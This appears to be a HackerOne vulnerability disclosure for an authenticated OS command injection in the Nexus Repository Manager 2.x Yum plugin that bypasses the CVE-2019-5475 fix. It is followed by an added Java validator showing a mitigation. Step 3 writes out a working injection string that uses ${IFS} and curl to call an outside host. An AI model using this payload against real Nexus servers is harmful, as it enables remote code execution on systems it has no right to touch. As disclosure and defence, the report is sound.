Central Security Project: OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)

2019-09-05T03:25:50
ID H1:688270
Type hackerone
Reporter badcode_
Modified 2019-10-29T11:03:48

Description

OS Command Injection in Nexus Repository Manager 2.x (bypass CVE-2019-5475)

Maven artifact

groupId: org.sonatype.nexus.plugins
artifactId: nexus-yum-repository-plugin
version: 2.14.14-01

Vulnerability

Vulnerability Description

The Nexus Yum Repository Plugin is vulnerable to Remote Code Execution. All code paths that pass user-supplied data into CommandLineExecutor.java are vulnerable, such as the Yum Configuration Capability.

Additional Details

Take a look at the patch for CVE-2019-5475

https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84

The getCleanCommand method introduced by that patch does not filter the command string completely, so the filter can still be bypassed.

Steps To Reproduce:

  1. Navigate to "Capabilities" in Nexus Repository Manager.

  2. Edit or create a new Yum: Configuration capability

  3. Set the path of "createrepo" or "mergerepo" to an OS command (e.g. /bin/bash -c curl${IFS}http://192.168.88.1:8000/ || /createrepo)
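The mitigation side of the bypass described above, as an added example that is not Sonatype's code and not taken from nexus-public: a hypothetical allowlist validator for the configured createrepo/mergerepo path that refuses everything the step 3 value relies on (whitespace, ${IFS}, ||, a bash binary name) and then launches the tool through ProcessBuilder with an argument list instead of a shell. The class and method names and the sample strings are assumptions.

```java
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.Paths;
import java.util.Arrays;
import java.util.HashSet;
import java.util.List;
import java.util.Set;
import java.util.regex.Pattern;

/** Hypothetical allowlist check for the createrepo/mergerepo path of the Yum capability (Java 8 compatible). */
public final class YumToolPathValidator {
    // Only these binary names are acceptable; "bash", "sh" or anything else is refused outright.
    private static final Set<String> ALLOWED_NAMES = new HashSet<>(Arrays.asList("createrepo", "mergerepo"));
    // Absolute path built only from safe characters: no whitespace, '$', '{', '|', ';', '&', quotes or backticks.
    // A value like "/bin/bash -c curl${IFS}http://... || /createrepo" fails here before anything is executed.
    private static final Pattern SAFE_ABS_PATH = Pattern.compile("^/[A-Za-z0-9._/-]+$");

    /** Returns the validated, normalized path or throws; the result never needs shell interpretation. */
    public static Path validate(String configured) {
        if (configured == null || !SAFE_ABS_PATH.matcher(configured).matches()) {
            throw new IllegalArgumentException("tool path must be absolute and free of shell metacharacters");
        }
        Path p = Paths.get(configured).normalize();   // collapses any "/../" segments before the name check
        if (p.getFileName() == null || !ALLOWED_NAMES.contains(p.getFileName().toString())) {
            throw new IllegalArgumentException("tool path must end in createrepo or mergerepo");
        }
        if (!Files.isRegularFile(p) || !Files.isExecutable(p)) {
            throw new IllegalArgumentException("tool path is not an executable regular file");
        }
        return p;
    }

    /** Launches the tool without a shell: argv is a list, never a string handed to "sh -c". */
    public static ProcessBuilder buildCommand(String configured, List<String> args) {
        Path tool = validate(configured);
        List<String> argv = new java.util.ArrayList<>(args);
        argv.add(0, tool.toString());
        return new ProcessBuilder(argv);
    }

    public static void main(String[] unused) {
        // Constructed inputs: one shaped like the report's payload, one legitimate configuration.
        for (String c : Arrays.asList("/bin/bash -c curl${IFS}http://example.invalid/ || /createrepo",
                                      "/usr/bin/createrepo")) {
            try { System.out.println("accepted: " + validate(c)); }
            catch (IllegalArgumentException e) { System.out.println("rejected: " + e.getMessage()); }
        }
    }
}
```

The second sample is also rejected on a host where /usr/bin/createrepo is not installed, which is the intended fail-closed behaviour for a path that cannot be verified.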

Supporting Material/References:

  • Ubuntu
  • Sonatype Nexus Repository Manager 2.14.14-01
  • Java 8

Wrap up

  • I contacted the maintainer to let them know: N
  • I opened an issue in the related repository: N

Impact

An authenticated user with sufficient privileges in a Nexus Repository Manager installation can exploit this to execute code on the underlying operating system.
